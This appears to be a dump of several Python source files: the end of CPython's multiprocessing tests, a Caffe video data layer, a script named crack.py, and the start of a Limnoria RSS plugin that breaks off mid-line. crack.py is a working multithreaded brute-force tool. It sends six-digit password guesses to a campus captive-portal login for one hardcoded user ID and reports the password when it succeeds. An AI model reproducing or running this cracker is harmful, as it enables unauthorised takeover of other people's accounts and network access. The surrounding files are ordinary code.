args=('d10',), exitpriority=1) d01 = Foo() util.Finalize(d01, conn.send, args=('d01',), exitpriority=0) d02 = Foo() util.Finalize(d02, conn.send, args=('d02',), exitpriority=0) d03 = Foo() util.Finalize(d03, conn.send, args=('d03',), exitpriority=0) util.Finalize(None, conn.send, args=('e',), exitpriority=-10) util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100) # call multiprocessing's cleanup function then exit process without # garbage collecting locals util._exit_function() conn.close() os._exit(0) def test_finalize(self): conn, child_conn = self.Pipe() p = self.Process(target=self._test_finalize, args=(child_conn,)) p.daemon = True p.start() p.join() result = [obj for obj in iter(conn.recv, 'STOP')] self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e']) # # Test that from ... import * works for each module # class _TestImportStar(BaseTestCase): ALLOWED_TYPES = ('processes',) def test_import(self): modules = [ 'multiprocessing', 'multiprocessing.connection', 'multiprocessing.heap', 'multiprocessing.managers', 'multiprocessing.pool', 'multiprocessing.process', 'multiprocessing.synchronize', 'multiprocessing.util' ] if HAS_REDUCTION: modules.append('multiprocessing.reduction') if c_int is not None: # This module requires _ctypes modules.append('multiprocessing.sharedctypes') for name in modules: __import__(name) mod = sys.modules[name] for attr in getattr(mod, '__all__', ()): self.assertTrue( hasattr(mod, attr), '%r does not have attribute %r' % (mod, attr) ) # # Quick test that logging works -- does not test logging output # class _TestLogging(BaseTestCase): ALLOWED_TYPES = ('processes',) def test_enable_logging(self): logger = multiprocessing.get_logger() logger.setLevel(util.SUBWARNING) self.assertTrue(logger is not None) logger.debug('this will not be printed') logger.info('nor will this') logger.setLevel(LOG_LEVEL) @classmethod def _test_level(cls, conn): logger = multiprocessing.get_logger() conn.send(logger.getEffectiveLevel()) def test_level(self): LEVEL1 = 32 LEVEL2 = 37 logger = multiprocessing.get_logger() root_logger = logging.getLogger() root_level = root_logger.level reader, writer = multiprocessing.Pipe(duplex=False) logger.setLevel(LEVEL1) p = self.Process(target=self._test_level, args=(writer,)) p.daemon = True p.start() self.assertEqual(LEVEL1, reader.recv()) logger.setLevel(logging.NOTSET) root_logger.setLevel(LEVEL2) p = self.Process(target=self._test_level, args=(writer,)) p.daemon = True p.start() self.assertEqual(LEVEL2, reader.recv()) root_logger.setLevel(root_level) logger.setLevel(level=LOG_LEVEL) # class _TestLoggingProcessName(BaseTestCase): # # def handle(self, record): # assert record.processName == multiprocessing.current_process().name # self.__handled = True # # def test_logging(self): # handler = logging.Handler() # handler.handle = self.handle # self.__handled = False # # Bypass getLogger() and side-effects # logger = logging.getLoggerClass()( # 'multiprocessing.test.TestLoggingProcessName') # logger.addHandler(handler) # logger.propagate = False # # logger.warn('foo') # assert self.__handled # # Check that Process.join() retries if os.waitpid() fails with EINTR # class _TestPollEintr(BaseTestCase): ALLOWED_TYPES = ('processes',) @classmethod def _killer(cls, pid): time.sleep(0.5) os.kill(pid, signal.SIGUSR1) @unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1') def test_poll_eintr(self): got_signal = [False] def record(*args): got_signal[0] = True pid = os.getpid() oldhandler = signal.signal(signal.SIGUSR1, record) try: killer = self.Process(target=self._killer, args=(pid,)) killer.start() p = self.Process(target=time.sleep, args=(1,)) p.start() p.join() self.assertTrue(got_signal[0]) self.assertEqual(p.exitcode, 0) killer.join() finally: signal.signal(signal.SIGUSR1, oldhandler) # # Test to verify handle verification, see issue 3321 # class TestInvalidHandle(unittest.TestCase): @unittest.skipIf(WIN32, "skipped on Windows") def test_invalid_handles(self): conn = _multiprocessing.Connection(44977608) self.assertRaises(IOError, conn.poll) self.assertRaises(IOError, _multiprocessing.Connection, -1) # # Functions used to create test cases from the base ones in this module # def get_attributes(Source, names): d = {} for name in names: obj = getattr(Source, name) if type(obj) == type(get_attributes): obj = staticmethod(obj) d[name] = obj return d def create_test_cases(Mixin, type): result = {} glob = globals() Type = type.capitalize() for name in glob.keys(): if name.startswith('_Test'): base = glob[name] if type in base.ALLOWED_TYPES: newname = 'With' + Type + name[1:] class Temp(base, unittest.TestCase, Mixin): pass result[newname] = Temp Temp.__name__ = newname Temp.__module__ = Mixin.__module__ return result # # Create test cases # class ProcessesMixin(object): TYPE = 'processes' Process = multiprocessing.Process locals().update(get_attributes(multiprocessing, ( 'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore', 'Condition', 'Event', 'Value', 'Array', 'RawValue', 'RawArray', 'current_process', 'active_children', 'Pipe', 'connection', 'JoinableQueue', 'Pool' ))) testcases_processes = create_test_cases(ProcessesMixin, type='processes') globals().update(testcases_processes) class ManagerMixin(object): TYPE = 'manager' Process = multiprocessing.Process manager = object.__new__(multiprocessing.managers.SyncManager) locals().update(get_attributes(manager, ( 'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore', 'Condition', 'Event', 'Value', 'Array', 'list', 'dict', 'Namespace', 'JoinableQueue', 'Pool' ))) testcases_manager = create_test_cases(ManagerMixin, type='manager') globals().update(testcases_manager) class ThreadsMixin(object): TYPE = 'threads' Process = multiprocessing.dummy.Process locals().update(get_attributes(multiprocessing.dummy, ( 'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore', 'Condition', 'Event', 'Value', 'Array', 'current_process', 'active_children', 'Pipe', 'connection', 'dict', 'list', 'Namespace', 'JoinableQueue', 'Pool' ))) testcases_threads = create_test_cases(ThreadsMixin, type='threads') globals().update(testcases_threads) class OtherTest(unittest.TestCase): # TODO: add more tests for deliver/answer challenge. def test_deliver_challenge_auth_failure(self): class _FakeConnection(object): def recv_bytes(self, size): return b'something bogus' def send_bytes(self, data): pass self.assertRaises(multiprocessing.AuthenticationError, multiprocessing.connection.deliver_challenge, _FakeConnection(), b'abc') def test_answer_challenge_auth_failure(self): class _FakeConnection(object): def __init__(self): self.count = 0 def recv_bytes(self, size): self.count += 1 if self.count == 1: return multiprocessing.connection.CHALLENGE elif self.count == 2: return b'something bogus' return b'' def send_bytes(self, data): pass self.assertRaises(multiprocessing.AuthenticationError, multiprocessing.connection.answer_challenge, _FakeConnection(), b'abc') # # Test Manager.start()/Pool.__init__() initializer feature - see issue 5585 # def initializer(ns): ns.test += 1 class TestInitializers(unittest.TestCase): def setUp(self): self.mgr = multiprocessing.Manager() self.ns = self.mgr.Namespace() self.ns.test = 0 def tearDown(self): self.mgr.shutdown() def test_manager_initializer(self): m = multiprocessing.managers.SyncManager() self.assertRaises(TypeError, m.start, 1) m.start(initializer, (self.ns,)) self.assertEqual(self.ns.test, 1) m.shutdown() def test_pool_initializer(self): self.assertRaises(TypeError, multiprocessing.Pool, initializer=1) p = multiprocessing.Pool(1, initializer, (self.ns,)) p.close() p.join() self.assertEqual(self.ns.test, 1) # # Issue 5155, 5313, 5331: Test process in processes # Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior # def _ThisSubProcess(q): try: item = q.get(block=False) except Queue.Empty: pass def _TestProcess(q): queue = multiprocessing.Queue() subProc = multiprocessing.Process(target=_ThisSubProcess, args=(queue,)) subProc.daemon = True subProc.start() subProc.join() def _afunc(x): return x*x def pool_in_process(): pool = multiprocessing.Pool(processes=4) x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7]) class _file_like(object): def __init__(self, delegate): self._delegate = delegate self._pid = None @property def cache(self): pid = os.getpid() # There are no race conditions since fork keeps only the running thread if pid != self._pid: self._pid = pid self._cache = [] return self._cache def write(self, data): self.cache.append(data) def flush(self): self._delegate.write(''.join(self.cache)) self._cache = [] class TestStdinBadfiledescriptor(unittest.TestCase): def test_queue_in_process(self): queue = multiprocessing.Queue() proc = multiprocessing.Process(target=_TestProcess, args=(queue,)) proc.start() proc.join() def test_pool_in_process(self): p = multiprocessing.Process(target=pool_in_process) p.start() p.join() def test_flushing(self): sio = StringIO() flike = _file_like(sio) flike.write('foo') proc = multiprocessing.Process(target=lambda: flike.flush()) flike.flush() assert sio.getvalue() == 'foo' # # Test interaction with socket timeouts - see Issue #6056 # class TestTimeouts(unittest.TestCase): @classmethod def _test_timeout(cls, child, address): time.sleep(1) child.send(123) child.close() conn = multiprocessing.connection.Client(address) conn.send(456) conn.close() def test_timeout(self): old_timeout = socket.getdefaulttimeout() try: socket.setdefaulttimeout(0.1) parent, child = multiprocessing.Pipe(duplex=True) l = multiprocessing.connection.Listener(family='AF_INET') p = multiprocessing.Process(target=self._test_timeout, args=(child, l.address)) p.start() child.close() self.assertEqual(parent.recv(), 123) parent.close() conn = l.accept() self.assertEqual(conn.recv(), 456) conn.close() l.close() p.join(10) finally: socket.setdefaulttimeout(old_timeout) # # Test what happens with no "if __name__ == '__main__'" # class TestNoForkBomb(unittest.TestCase): def test_noforkbomb(self): name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py') if WIN32: rc, out, err = test.script_helper.assert_python_failure(name) self.assertEqual('', out.decode('ascii')) self.assertIn('RuntimeError', err.decode('ascii')) else: rc, out, err = test.script_helper.assert_python_ok(name) self.assertEqual('123', out.decode('ascii').rstrip()) self.assertEqual('', err.decode('ascii')) # # # testcases_other = [OtherTest, TestInvalidHandle, TestInitializers, TestStdinBadfiledescriptor, TestTimeouts, TestNoForkBomb] # # # def test_main(run=None): if sys.platform.startswith("linux"): try: lock = multiprocessing.RLock() except OSError: raise unittest.SkipTest("OSError raises on RLock creation, see issue 3111!") check_enough_semaphores() if run is None: from test.test_support import run_unittest as run util.get_temp_dir() # creates temp directory for use by all processes multiprocessing.get_logger().setLevel(LOG_LEVEL) ProcessesMixin.pool = multiprocessing.Pool(4) ThreadsMixin.pool = multiprocessing.dummy.Pool(4) ManagerMixin.manager.__init__() ManagerMixin.manager.start() ManagerMixin.pool = ManagerMixin.manager.Pool(4) testcases = ( sorted(testcases_processes.values(), key=lambda tc:tc.__name__) + sorted(testcases_threads.values(), key=lambda tc:tc.__name__) + sorted(testcases_manager.values(), key=lambda tc:tc.__name__) + testcases_other ) loadTestsFromTestCase = unittest.defaultTestLoader.loadTestsFromTestCase suite = unittest.TestSuite(loadTestsFromTestCase(tc) for tc in testcases) # (ncoghlan): Whether or not sys.exc_clear is executed by the threading # module during these tests is at least platform dependent and possibly # non-deterministic on any given platform. So we don't mind if the listed # warnings aren't actually raised. with test_support.check_py3k_warnings( (".+__(get|set)slice__ has been removed", DeprecationWarning), (r"sys.exc_clear\(\) not supported", DeprecationWarning), quiet=True): run(suite) ThreadsMixin.pool.terminate() ProcessesMixin.pool.terminate() ManagerMixin.pool.terminate() ManagerMixin.manager.shutdown() del ProcessesMixin.pool, ThreadsMixin.pool, ManagerMixin.pool def main(): test_main(unittest.TextTestRunner(verbosity=2).run) if __name__ == '__main__': main()
sequence_input_layer.py
#!/usr/bin/env python #Data layer for video. Change flow_frames and RGB_frames to be the path to the flow and RGB frames. import sys sys.path.append('../../python') import caffe import io from PIL import Image import matplotlib.pyplot as plt import numpy as np import scipy.misc import time import pdb import glob import pickle as pkl import random import h5py from multiprocessing import Pool from threading import Thread import skimage.io import copy flow_frames = 'flow_images/' RGB_frames = 'frames/' test_frames = 16 train_frames = 16 test_buffer = 3 train_buffer = 24 def processImageCrop(im_info, transformer, flow): im_path = im_info[0] im_crop = im_info[1] im_reshape = im_info[2] im_flip = im_info[3] data_in = caffe.io.load_image(im_path) if (data_in.shape[0] < im_reshape[0]) | (data_in.shape[1] < im_reshape[1]): data_in = caffe.io.resize_image(data_in, im_reshape) if im_flip: data_in = caffe.io.flip_image(data_in, 1, flow) data_in = data_in[im_crop[0]:im_crop[2], im_crop[1]:im_crop[3], :] processed_image = transformer.preprocess('data_in',data_in) return processed_image class ImageProcessorCrop(object): def __init__(self, transformer, flow): self.transformer = transformer self.flow = flow def __call__(self, im_info): return processImageCrop(im_info, self.transformer, self.flow) class sequenceGeneratorVideo(object): def __init__(self, buffer_size, clip_length, num_videos, video_dict, video_order): self.buffer_size = buffer_size self.clip_length = clip_length self.N = self.buffer_size*self.clip_length self.num_videos = num_videos self.video_dict = video_dict self.video_order = video_order self.idx = 0 def __call__(self): label_r = [] im_paths = [] im_crop = [] im_reshape = [] im_flip = [] if self.idx + self.buffer_size >= self.num_videos: idx_list = range(self.idx, self.num_videos) idx_list.extend(range(0, self.buffer_size-(self.num_videos-self.idx))) else: idx_list = range(self.idx, self.idx+self.buffer_size) for i in idx_list: key = self.video_order[i] label = self.video_dict[key]['label'] video_reshape = self.video_dict[key]['reshape'] video_crop = self.video_dict[key]['crop'] label_r.extend([label]*self.clip_length) im_reshape.extend([(video_reshape)]*self.clip_length) r0 = int(random.random()*(video_reshape[0] - video_crop[0])) r1 = int(random.random()*(video_reshape[1] - video_crop[1])) im_crop.extend([(r0, r1, r0+video_crop[0], r1+video_crop[1])]*self.clip_length) f = random.randint(0,1) im_flip.extend([f]*self.clip_length) rand_frame = int(random.random()*(self.video_dict[key]['num_frames']-self.clip_length)+1+1) frames = [] for i in range(rand_frame,rand_frame+self.clip_length): frames.append(self.video_dict[key]['frames'] %i) im_paths.extend(frames) im_info = zip(im_paths,im_crop, im_reshape, im_flip) self.idx += self.buffer_size if self.idx >= self.num_videos: self.idx = self.idx - self.num_videos return label_r, im_info def advance_batch(result, sequence_generator, image_processor, pool): label_r, im_info = sequence_generator() tmp = image_processor(im_info[0]) result['data'] = pool.map(image_processor, im_info) result['label'] = label_r cm = np.ones(len(label_r)) cm[0::16] = 0 result['clip_markers'] = cm class BatchAdvancer(): def __init__(self, result, sequence_generator, image_processor, pool): self.result = result self.sequence_generator = sequence_generator self.image_processor = image_processor self.pool = pool def __call__(self): return advance_batch(self.result, self.sequence_generator, self.image_processor, self.pool) class videoRead(caffe.Layer): def initialize(self): self.train_or_test = 'test' self.flow = False self.buffer_size = test_buffer #num videos processed per batch self.frames = test_frames #length of processed clip self.N = self.buffer_size*self.frames self.idx = 0 self.channels = 3 self.height = 227 self.width = 227 self.path_to_images = RGB_frames self.video_list = 'ts_lstm.txt' def setup(self, bottom, top): random.seed(10) self.initialize() f = open(self.video_list, 'r') f_lines = f.readlines() f.close() video_dict = {} current_line = 0 self.video_order = [] for ix, line in enumerate(f_lines): video = line.split(' ')[0] l = int(line.split(' ')[1]) frames = glob.glob('%s%s/*.jpg' %(self.path_to_images, video)) num_frames = len(frames) video_dict[video] = {} video_dict[video]['frames'] = frames[0].split('.')[0] + '.%04d.jpg' video_dict[video]['reshape'] = (240,320) video_dict[video]['crop'] = (227, 227) video_dict[video]['num_frames'] = num_frames video_dict[video]['label'] = l self.video_order.append(video) self.video_dict = video_dict self.num_videos = len(video_dict.keys()) #set up data transformer shape = (self.N, self.channels, self.height, self.width) self.transformer = caffe.io.Transformer({'data_in': shape}) self.transformer.set_raw_scale('data_in', 255) if self.flow: image_mean = [128, 128, 128] self.transformer.set_is_flow('data_in', True) else: image_mean = [103.939, 116.779, 128.68] self.transformer.set_is_flow('data_in', False) channel_mean = np.zeros((3,227,227)) for channel_index, mean_val in enumerate(image_mean): channel_mean[channel_index, ...] = mean_val self.transformer.set_mean('data_in', channel_mean) self.transformer.set_channel_swap('data_in', (2, 1, 0)) self.transformer.set_transpose('data_in', (2, 0, 1)) self.thread_result = {} self.thread = None pool_size = 24 self.image_processor = ImageProcessorCrop(self.transformer, self.flow) self.sequence_generator = sequenceGeneratorVideo(self.buffer_size, self.frames, self.num_videos, self.video_dict, self.video_order) self.pool = Pool(processes=pool_size) self.batch_advancer = BatchAdvancer(self.thread_result, self.sequence_generator, self.image_processor, self.pool) self.dispatch_worker() self.top_names = ['data', 'label','clip_markers'] print 'Outputs:', self.top_names if len(top) != len(self.top_names): raise Exception('Incorrect number of outputs (expected %d, got %d)' % (len(self.top_names), len(top))) self.join_worker() for top_index, name in enumerate(self.top_names): if name == 'data': shape = (self.N, self.channels, self.height, self.width) elif name == 'label': shape = (self.N,) elif name == 'clip_markers': shape = (self.N,) top[top_index].reshape(*shape) def reshape(self, bottom, top): pass def forward(self, bottom, top): if self.thread is not None: self.join_worker() #rearrange the data: The LSTM takes inputs as [video0_frame0, video1_frame0,...] but the data is currently arranged as [video0_frame0, video0_frame1, ...] new_result_data = [None]*len(self.thread_result['data']) new_result_label = [None]*len(self.thread_result['label']) new_result_cm = [None]*len(self.thread_result['clip_markers']) for i in range(self.frames): for ii in range(self.buffer_size): old_idx = ii*self.frames + i new_idx = i*self.buffer_size + ii new_result_data[new_idx] = self.thread_result['data'][old_idx] new_result_label[new_idx] = self.thread_result['label'][old_idx] new_result_cm[new_idx] = self.thread_result['clip_markers'][old_idx] for top_index, name in zip(range(len(top)), self.top_names): if name == 'data': for i in range(self.N): top[top_index].data[i, ...] = new_result_data[i] elif name == 'label': top[top_index].data[...] = new_result_label elif name == 'clip_markers': top[top_index].data[...] = new_result_cm self.dispatch_worker() def dispatch_worker(self): assert self.thread is None self.thread = Thread(target=self.batch_advancer) self.thread.start() def join_worker(self): assert self.thread is not None self.thread.join() self.thread = None def backward(self, top, propagate_down, bottom): pass class videoReadTrain_flow(videoRead): def initialize(self): self.train_or_test = 'train' self.flow = True self.buffer_size = train_buffer #num videos processed per batch self.frames = train_frames #length of processed clip self.N = self.buffer_size*self.frames self.idx = 0 self.channels = 3 self.height = 227 self.width = 227 self.path_to_images = flow_frames self.video_list = 'tr_lstm.txt' class videoReadTest_flow(videoRead): def initialize(self): self.train_or_test = 'test' self.flow = True self.buffer_size = test_buffer #num videos processed per batch self.frames = test_frames #length of processed clip self.N = self.buffer_size*self.frames self.idx = 0 self.channels = 3 self.height = 227 self.width = 227 self.path_to_images = flow_frames self.video_list = 'ts_lstm.txt' class videoReadTrain_RGB(videoRead): def initialize(self): self.train_or_test = 'train' self.flow = False self.buffer_size = train_buffer #num videos processed per batch self.frames = train_frames #length of processed clip self.N = self.buffer_size*self.frames self.idx = 0 self.channels = 3 self.height = 227 self.width = 227 self.path_to_images = RGB_frames self.video_list = 'tr_lstm.txt' class videoReadTest_RGB(videoRead): def initialize(self): self.train_or_test = 'test' self.flow = False self.buffer_size = test_buffer #num videos processed per batch self.frames = test_frames #length of processed clip self.N = self.buffer_size*self.frames self.idx = 0 self.channels = 3 self.height = 227 self.width = 227 self.path_to_images = RGB_frames self.video_list = 'ts_lstm.txt'
crack.py
# -*- coding: utf-8 -*- import os import re import sys import string import requests import threading flag = False correct = "None" def getpwd(username,query_str,minr,maxr): global flag global correct url = 'http://192.168.50.3:8080/eportal/InterFace.do?method=login' i = minr while i < maxr: password = "%06d" % i i = i + 1 post_data = { 'userId': username, 'password': password, 'queryString': query_str, 'service': '', 'operatorPwd': '', 'validcode': '', } responce = requests.request('POST', url, data=post_data) responce.encoding = 'UTF-8' res_json = responce.json() if flag == False and (res_json['result'] == 'success' or res_json['message'] == '您的账户已欠费,为了不影响您正常使用网络,请尽快缴费!'): print(password+" "+"破解成功") correct = password flag = True elif res_json['result'] == 'fail': if res_json['message'] == '密码不匹配,请输入正确的密码!': print("%d %s"%(i,password+" "+res_json['message']+" "+res_json['result'])) else: print(password+" "+res_json['message']+" "+res_json['result']) # i = i - 1 continue if flag == True: return if __name__ == '__main__': # 测试请求 try: result = requests.get('http://www.baidu.com') except Exception: print('Failed to connect test website!') sys.exit() #未联网则开始破解 if result.text.find('eportal') != -1: threadl = [] usrname = 'D201677754' pattarn = re.compile(r"href=.*?\?(.*?)'") query_str = pattarn.findall(result.text) for i in range(1,32): t = threading.Thread(target=getpwd, args =(usrname,query_str,10000*i,10000*(i+1))) threadl.append(t) for t in threadl: t.start() for t in threadl: t.join() print(usrname+" 正确密码为: "+correct) os.system("pause"); elif result.text.find('baidu') != -1: print('请在未联网下进行') else: print("Opps, something goes wrong!")
plugin.py
### # Copyright (c) 2002-2004, Jeremiah Fincher # Copyright (c) 2008-2010, James McCoy # Copyright (c) 2014, Valentin Lorentz # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, # this list of conditions, and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions, and the following disclaimer in the # documentation and/or other materials provided with the distribution. # * Neither the name of the author of this software nor the name of # contributors to this software may be used to endorse or promote products # derived from this software without specific prior written consent. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. ### import re import os import sys import json import time import types import string import socket import threading import feedparser import supybot.conf as conf import supybot.utils as utils import supybot.world as world from supybot.commands import * import supybot.utils.minisix as minisix import supybot.ircmsgs as ircmsgs import supybot.ircutils as ircutils import supybot.registry as registry import supybot.callbacks as callbacks from supybot.i18n import PluginInternationalization, internationalizeDocstring _ = PluginInternationalization('RSS') if minisix.PY2: from urllib2 import ProxyHandler else: from urllib.request import ProxyHandler def get_feedName(irc, msg, args, state): if ircutils.isChannel(args[0]): state.errorInvalid('feed name', args[0], 'must not be channel names.') if not registry.isValidRegistryName(args[0]): state.errorInvalid('feed name', args[0], 'Feed names must not include spaces.') state.args.append(callbacks.canonicalName(args.pop(0))) addConverter('feedName', get_feedName) announced_headlines_filename = \ conf.supybot.directories.data.dirize('RSS_announced.flat') def only_one_at_once(f): lock = [False] def newf(*args, **kwargs): if lock[0]: return lock[0] = True try: f(*args, **kwargs) finally: lock[0] = False return newf class InvalidFeedUrl(ValueError): pass class Feed: __slots__ = ('url', 'name', 'data', 'last_update', 'entries', 'etag', 'modified', 'initial', 'lock', 'announced_entries') def __init__(self, name, url, initial, plugin_is_loading=False, announced=None): assert name, name if not url: if not utils.web.httpUrlRe.match(name): raise InvalidFeedUrl(name) url = name self.name = name self.url = url self.initial = initial self.data = None # We don't want to fetch feeds right after the plugin is # loaded (the bot could be starting, and thus already busy) self.last_update = time.time() if plugin_is_loading else 0 self.entries = [] self.etag = None self.modified = None self.lock = threading.Lock() self.announced_entries = announced or \ utils.structures.TruncatableSet() def __repr__(self): return 'Feed(%r, %r, %b, <bool>, %r)' % \ (self.name, self.url, self.initial, self.announced_entries) def get_command(self, plugin): docstring = format(_("""[<number of headlines>] Reports the titles for %s at the RSS feed %u. If <number of headlines> is given, returns only that many headlines. RSS feeds are only looked up every supybot.plugins.RSS.waitPeriod seconds, which defaults to 1800 (30 minutes) since that's what most websites prefer."""), self.name, self.url) def f(self2, irc, msg, args): args.insert(0, self.name) self2.rss(irc, msg, args) f = utils.python.changeFunctionName(f, self.name, docstring) f = types.MethodType(f, plugin) return f _sort_parameters = { 'oldestFirst': (('published_parsed', 'updated_parsed'), False), 'newestFirst': (('published_parsed', 'updated_parsed'), True), 'outdatedFirst': (('updated_parsed', 'published_parsed'), False), 'updatedFirst': (('updated_parsed', 'published_parsed'), True), } def _sort_arguments(order): (fields, reverse) = _sort_parameters[order] def key(entry): for field in fields: if field in entry: return entry[field] raise KeyError('No date field in entry.') return (key, reverse) def sort_feed_items(items, order): """Return feed items, sorted according to sortFeedItems.""" if order == 'asInFeed': return items (key, reverse) = _sort_arguments(order) try: sitems = sorted(items, key=key, reverse=reverse) except KeyError: # feedparser normalizes required timestamp fields in ATOM and RSS # to the "published"/"updated" fields. Feeds missing it are unsortable by date. return items return sitems def load_announces_db(fd): return dict((name, utils.structures.TruncatableSet(entries)) for (name, entries) in json.load(fd).items()) def save_announces_db(db, fd): json.dump(dict((name, list(entries)) for (name, entries) in db), fd) class RSS(callbacks.Plugin): """This plugin is useful both for announcing updates to RSS feeds in a channel, and for retrieving the headlines of RSS feeds via command. Use the "add" command to add feeds to this plugin, and use the "announce" command to determine what feeds should be announced in a given channel.""" threaded = True def __init__(self, irc): self.__parent = super(RSS, self) self.__parent.__init__(irc) # Scheme: {name: url} self.feed_names = callbacks.CanonicalNameDict() # Scheme: {url: feed} self.feeds = {} if os.path.isfile(announced_headlines_filename): with open(announced_headlines_filename) as fd: announced = load_announces_db(fd) else: announced = {} for name in self.registryValue('feeds'): self.assert_feed_does_not_exist(name) self.register_feed_config(name) try: url = self.registryValue(registry.join(['feeds', name])) except registry.NonExistentRegistryEntry: self.log.warning('%s is not a registered feed, removing.',name) continue try: self.register_feed(name, url, True, True, announced.get(name, [])) except InvalidFeedUrl: self.log.error('%s is not a valid feed, removing.', name) continue world.flushers.append(self._flush) def die(self): self._flush() world.flushers.remove(self._flush) self.__parent.die() def _flush(self): l = [(f.name, f.announced_entries) for f in self.feeds.values()] with utils.file.AtomicFile(announced_headlines_filename, 'w', backupDir='/dev/null') as fd: save_announces_db(l, fd) ################## # Feed registering def assert_feed_does_not_exist(self, name, url=None): if self.isCommandMethod(name): s = format(_('I already have a command in this plugin named %s.'), name) raise callbacks.Error(s) if url: feed = self.feeds.get(url) if feed and feed.name != feed.url: s = format(_('I already have a feed with that URL named %s.'), feed.name) raise callbacks.Error(s) def register_feed_config(self, name, url=''): self.registryValue('feeds').add(name) group = self.registryValue('feeds', value=False) conf.registerGlobalValue(group, name, registry.String(url, '')) feed_group = conf.registerGroup(group, name) conf.registerChannelValue(feed_group, 'format', registry.String('', _("""Feed-specific format. Defaults to supybot.plugins.RSS.format if empty."""))) conf.registerChannelValue(feed_group, 'announceFormat', registry.String('', _("""Feed-specific announce format. Defaults to supybot.plugins.RSS.announceFormat if empty."""))) conf.registerGlobalValue(feed_group, 'waitPeriod', registry.NonNegativeInteger(0, _("""If set to a non-zero value, overrides supybot.plugins.RSS.waitPeriod for this particular feed."""))) def register_feed(self, name, url, initial, plugin_is_loading, announced=[]): self.feed_names[name] = url self.feeds[url] = Feed(name, url, initial, plugin_is_loading, announced) def remove_feed(self, feed): del self.feed_names[feed.name] del self.feeds[feed.url] conf.supybot.plugins.RSS.feeds().remove(feed.name) conf.supybot.plugins.RSS.feeds.unregister(feed.name) ################## # Methods handling def isCommandMethod(self, name): if not self.__parent.isCommandMethod(name): return bool(self.get_feed(name)) else: return True def listCommands(self): return self.__parent.listCommands(self.feed_names.keys()) def getCommandMethod(self, command): try: return self.__parent.getCommandMethod(command) except AttributeError: return self.get_feed(command[0]).get_command(self) def __call__(self, irc, msg): self.__parent.__call__(irc, msg) threading.Thread(target=self.update_feeds).start() ################## # Status accessors def get_feed(self, name): return self.feeds.get(self.feed_names.get(name, name), None) def is_expired(self, feed): assert feed period = self.registryValue('waitPeriod') if feed.name != feed.url: # Named feed specific_period = self.registryValue('feeds.%s.waitPeriod' % feed.name) if specific_period: period = specific_period event_horizon = time.time() - period return feed.last_update < event_horizon ############### # Feed fetching def update_feed(self, feed): handlers = [] if utils.web.proxy(): handlers.append(ProxyHandler( {'http': utils.force(utils.web.proxy())})) handlers.append(ProxyHandler( {'https': utils.force(utils.web.proxy())})) with feed.lock: d = feedparser.parse(feed.url, etag=feed.etag, modified=feed.modified, handlers=handlers) if 'status' not in d or d.status != 304: # Not modified if 'etag' in d: feed.etag = d.etag if 'modified' in d: feed.modified = d.modified feed.data = d.feed feed.entries = d.entries feed.last_update = time.time() (initial, feed.initial) = (feed.initial, False) self.announce_feed(feed, initial) def update_feed_in_thread(self, feed): feed.last_update = time.time() t = world.SupyThread(target=self.update_feed, name=format('Fetching feed %u', feed.url), args=(feed,)) t.setDaemon(True) t.start() def update_feed_if_needed(self, feed): if self.is_expired(feed): self.update_feed(feed) @only_one_at_once def update_feeds(self): announced_feeds = set() for irc in world.ircs: for channel in irc.state.channels: announced_feeds |= self.registryValue('announce', channel) for name in announced_feeds: feed = self.get_feed(name) if not feed: self.log.warning('Feed %s is announced but does not exist.', name) continue self.update_feed_if_needed(feed) def get_new_entries(self, feed): # http://validator.w3.org/feed/docs/rss2.html#hrelementsOfLtitemgt get_id = lambda entry: entry.id if hasattr(entry, 'id') else ( entry.title if hasattr(entry, 'title') else entry.description) with feed.lock: entries = feed.entries new_entries = [entry for entry in entries if get_id(entry) not in feed.announced_entries] if not new_entries: return [] feed.announced_entries |= set(get_id(entry) for entry in new_entries) # We keep a little more because we don't want to re-announce # oldest entries if one of the newest gets removed. feed.announced_entries.truncate(10*len(entries)) return new_entries def announce_feed(self, feed, initial): new_entries = self.get_new_entries(feed) order = self.registryValue('sortFeedItems') new_entries = sort_feed_items(new_entries, order) for irc in world.ircs: for channel in irc.state.channels: if feed.name not in self.registryValue('announce', channel): continue if initial: n = self.registryValue('initialAnnounceHeadlines', channel) if n: announced_entries = new_entries[-n:] else: announced_entries = [] else: announced_entries = new_entries for entry in announced_entries: self.announce_entry(irc, channel, feed, entry) ################# # Entry rendering def should_send_entry(self, channel, entry): whitelist = self.registryValue('keywordWhitelist', channel) blacklist = self.registryValue('keywordBlacklist', channel) # fix shadowing by "from supybot.commands import *" try: all = __builtins__.all any = __builtins__.any except AttributeError: all = __builtins__['all'] any = __builtins__['any'] if whitelist: if all(kw not in entry.title and kw not in entry.description for kw in whitelist): return False if blacklist: if any(kw in entry.title or kw in entry.description for kw in blacklist): return False return True _normalize_entry = utils.str.multipleReplacer( {'\r': ' ', '\n': ' ', '\x00': 